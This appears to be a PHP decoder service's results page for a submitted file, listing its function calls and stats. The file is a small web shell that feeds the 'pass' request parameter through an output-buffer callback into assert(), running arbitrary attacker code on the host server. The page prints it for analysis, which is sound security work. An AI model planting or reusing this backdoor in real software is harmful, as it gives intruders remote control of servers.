Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $evalstr=""; function myeval($c,$d) { global $evalstr; $evalstr=$c; } ob_star..
Decoded Output download
None
Did this file decode correctly?
Original Code
<?php
$evalstr="";
function myeval($c,$d)
{
global $evalstr;
$evalstr=$c;
}
ob_start('myeval');
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>
Function Calls
assert | 1 |
ob_start | 1 |
ob_end_flush | 1 |
Stats
MD5 | 6ffbf0dac87ca6344c116bd370aa97df |
Eval Count | 0 |
Decode Time | 139 ms |